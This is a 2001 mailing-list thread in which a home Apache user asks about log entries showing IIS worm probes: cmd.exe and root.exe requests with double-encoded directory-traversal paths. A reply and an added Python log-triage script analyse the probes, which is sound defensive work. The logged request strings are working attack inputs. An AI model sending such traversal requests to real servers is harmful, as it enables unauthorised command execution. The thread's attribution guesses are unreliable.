High,

On Mon, 29 Oct 2001, Ole Sebastian Stein wrote:
> We just got our ADSL and now have a server running Apache on a potato box
> at home. DynDNS provides us with dynamic dns.
>
> Today I found these lines in my access.log:
>
> 213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
>
> and so on. To me it looks as if 213.145.168.244 is trying
> to execute some file giving him root access. Is someone trying to
> crack my machine? What should I do?
>

Looks like a harmless attempt, because it tries to open M$ files. If this
goes on and on you might want to block access from that host. Perhaps a
previous user of your ip had a warez ftp server and people try to login to
download stuff.

Look from where the attack is coming:

$ host 213.145.168.244
Name: 213-145-168-244.dd.nextgentel.com
Address: 213.145.168.244

and send a mail to [EMAIL PROTECTED] to inform them.

Greetz,
Sebastiaan
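The triage done by eye in this thread, written as a log check. This is an added example, not part of the original messages: it flags requests for the Windows executables and double-encoded traversal sequences quoted above, groups them per source host, and counts how many got a non-error response. The function names and the sample hosts (documentation address ranges) are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+$')
PROBE_RE = re.compile(r"(?:cmd|root)\.exe", re.I)  # names seen in the post
# Constructed sample: request paths from the post, documentation-range hosts
SAMPLE = [
    '192.0.2.10 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '192.0.2.10 - - [29/Oct/2001:12:54:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218',
    '192.0.2.10 - - [29/Oct/2001:12:54:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232',
    '198.51.100.7 - - [29/Oct/2001:12:55:02 +0100] "GET /index.html HTTP/1.0" 200 1024',
]

def fully_decode(path, rounds=3):
    """Percent-decode a few rounds so %255c -> %5c -> backslash is visible."""
    for _ in range(rounds):
        path = unquote(path)
    return path

def classify(line):
    """Return (host, status, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line.strip())
    parts = m.group(2).split() if m else []
    if len(parts) < 2:
        return None  # not common log format, or a malformed request line
    once, full = unquote(parts[1]), fully_decode(parts[1])
    reasons = []
    if PROBE_RE.search(full):
        reasons.append("windows-executable")
    if full != once:  # a second decoding round still changed the path
        reasons.append("double-encoded")
    if "..\\" in full or "../" in full:
        reasons.append("traversal")
    return (m.group(1), int(m.group(3)), reasons) if reasons else None

def summarize(lines):
    """Per source host: probe count, responses below 400, reasons seen."""
    report = defaultdict(lambda: {"hits": 0, "served": 0, "reasons": set()})
    for host, status, reasons in filter(None, map(classify, lines)):
        report[host]["hits"] += 1
        report[host]["served"] += int(status < 400)
        report[host]["reasons"].update(reasons)
    return dict(report)

if __name__ == "__main__":
    for host, info in summarize(SAMPLE).items():
        print(host, info["hits"], info["served"], sorted(info["reasons"]))
```

A host with many hits and `served` at 0, as in the quoted log where every request returned 404, matches the reply's reading; any non-zero `served` count is the case worth a closer look.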